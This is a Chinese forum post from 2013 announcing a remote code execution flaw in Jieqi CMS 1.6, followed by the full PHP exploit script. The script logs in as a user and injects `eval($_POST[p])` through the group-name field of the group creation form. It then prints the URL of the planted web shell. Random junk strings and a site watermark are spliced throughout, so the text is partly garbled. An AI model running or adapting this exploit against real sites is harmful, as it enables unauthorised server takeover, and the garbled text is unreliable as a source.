杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。# M5 Q/ O: _, [: Q! g1 c
, T6 b9 }1 m8 z) m; {) k
9 `% ^* y+ h2 a j该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
4 {4 T. i/ a6 ]) ~. f 需要有一个能创建圈子的用户。
% |/ w/ S' a9 y 8 y5 B+ C. H& E+ f
<?php( g1 ~+ g. y$ N: P0 m
9 |) @+ ?( @* T9 }2 {4 |* rprint_r('! V2 F2 u0 S5 X$ a- O( i+ G
+---------------------------------------------------------------------------+1 T! `, s: s0 ^2 F L# ?
Jieqi CMS V1.6 PHP Code Injection Exploit
8 f. u% Y/ H. R b7 a# h/ q1 Dby flyh4t
Y, ]( ?( Y7 h; l9 D- gmail: phpsec at hotmail dot com
1 Z6 l5 S8 Y8 D( Oteam: http://www.wolvez.org( C; Q* F1 F5 }( l" s5 b- N& g
+---------------------------------------------------------------------------+# {1 r" n% x; I( w% Y) g' z
'); /**
5 I4 J) y$ e' k1 \4 K * works regardless of php.ini settings8 D$ ]5 S2 U% e
*/ if ($argc < 5) { print_r('# P$ F- E" J: v& r5 M4 M7 z+ k
+---------------------------------------------------------------------------+
1 U: X$ @" |! H, b; OUsage: php '.$argv[0].' host path username+ C; N( z/ {( _! m0 k5 E- i y
host: target server (ip/hostname)" q9 \$ j% r: n9 z. _
path: path to jieqicms
+ e4 Y3 l7 g6 X2 q* Y" u0 `uasename: a username who can create group
2 @; A' f# a: X, o$ ?Example:# |' H& D9 a) [
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
E# R4 _4 Q( Y c. `+---------------------------------------------------------------------------+
+ i6 n. V/ V! ]/ H* g M- Y* a'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961 C( V4 H; P7 {4 J5 @
Content-Disposition: form-data; name="gname"
: S# M; D) `" G* n( T0 `* V5 e0 F
- J4 u+ @/ L4 i'; $params .="';"; $params .='eval($_POST[p]);//flyh4t9 u" l/ O$ q3 w7 }3 r# X
-----------------------------232811682799613 c0 ?& C- P1 m! [. P
Content-Disposition: form-data; name="gcatid"
: d# F4 e- a, @0 t
% Z% y2 I8 h! E! {0 E1
! @) a1 C9 M% `' D% O" D$ M-----------------------------23281168279961
4 G% Q/ D+ c9 y- k) s# @Content-Disposition: form-data; name="gaudit"% l: b& h p& m# T' U: z! ^+ {/ r
- ~, P4 L) T. O+ U
1
: D( X i" f0 l, R2 V" M j-----------------------------23281168279961( l7 Q, E+ L( Q/ X9 M
Content-Disposition: form-data; name="gbrief"
! z* K5 { ^0 W% K3 [4 J1 ^; M2 H
& L/ w0 T! Y' t" O% h1
, v; B# Q; J' C! O p! X/ T0 p! w-----------------------------23281168279961--7 C2 q0 M! ] l/ i+ k
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
8 E/ a* p! X a, s- | y) V
' Y9 e1 Y `* t! |* n& |preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对